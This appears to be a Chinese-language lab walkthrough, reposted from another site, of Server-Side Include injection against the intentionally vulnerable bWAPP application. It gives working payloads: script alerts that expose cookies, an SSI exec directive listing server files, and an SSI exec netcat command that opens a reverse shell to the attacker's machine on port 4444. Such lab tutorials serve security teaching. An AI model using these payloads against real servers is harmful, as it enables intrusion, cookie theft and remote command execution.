使用bWapp学习服务器端命令注入

简介

在本文中,您将学习如何通关SSI利用注入检测服务器安全。

SSI是用于向HTML页面提供动态内容的Web应用程序上的指令。服务器端包括攻击允许通过在HTML页面中注入脚本或远程执行任意代码来利用Web应用程序。攻击者可以访问敏感信息,如密码文件,并执行shell命令。SSI指令注入到输入字段中,并将它们发送到Web服务器。

欲了解更多信息,请访问owasp.org

开始

使用kali Linux在浏览器中打开目标IP: 192.168.1.103/bWAPP/login.php。输入用户名和密码分别为bee bug

设置 安全级别 ,从列表框选择您的错误选择服务器端包括注入现在单击 Hack

 

1

现在请求网页会打开,你可以看到它有两个文字字段的名字和姓氏。

2

 

然后我使用随机的名字test:test作为对名字和姓氏额尊重,当我点击Lookup选项卡时我将收到什么。这里提到文本容易受到SSI注入的攻击。

3

 

当我点击查找,一个新的wep页面弹出在窗口屏幕上,显示了我的Kali Linux 的IP 192.168.1.107

4

 

现在我将尝试通过将不同类型的恶意代码发送到Web应用程序来利用此漏洞。如果您在这里仔细看到以下屏幕截图,我已经发送了一个脚本,将在窗口屏幕中生成一个alert。要执行此操作,您需要修改名字的文本字段并在其中键入以下代码。

<script>alert(“hack”)</script>

5

 

所以当我们再次点击查找时,会在窗口屏幕中弹出一个提示“ hack ”。因此,我确认提交的input.text是脆弱的。

6

 

如果我愿意获取web服务器的cookie,那么这里也是可以的。只有我们需要在相同的文本文件中键入以下脚本代码。

<script>alert(document.cookie)</script>

7

 

现在再次出现一个提醒提示,会弹出服务器的cookie,我们可以使用它来做进一步利用。

8

 

使用exec指令,我们可以使用cmd作为参数执行服务器端命令。在这里,我试图使用以下代码检索所有文件和文件夹列表。

<!–#exec cmd=”ls -a” –>

9

 

Great!!

你可以看到由于没有正确配置服务器,我们已经可以看到网站目录中所有文件。

10

 

最后终于我们将尝试使用netcat访问其远程shell,这将帮助我们建立与目标系统的反向连接。打开一个终端,启动端口4444上的netcat侦听器,并在上述的漏洞文本中输入以下内容。

<!–#exec cmd=”nc 192.168.1.107 4444 -e /bin/bash” –>

11

 

所以当您再次点击Lookup标签时,您将通过netcat shell获得反向连接,可以看到如下截图,这意味着Web应用程序服务器被黑客入侵,我们可以执行以下命令来渗透越来越多。

12

ID

pwd

 

*参考来源:hackingarticles,转载请注明来自MottoIN

原创文章,作者:Jarry,如若转载,请注明出处:http://www.mottoin.com/101526.html

发表评论

登录后才能评论

联系我们

021-62666911

在线咨询:点击这里给我发消息

邮件:root@mottoin.com

工作时间:周一至周五,9:30-18:30,节假日休息

QR code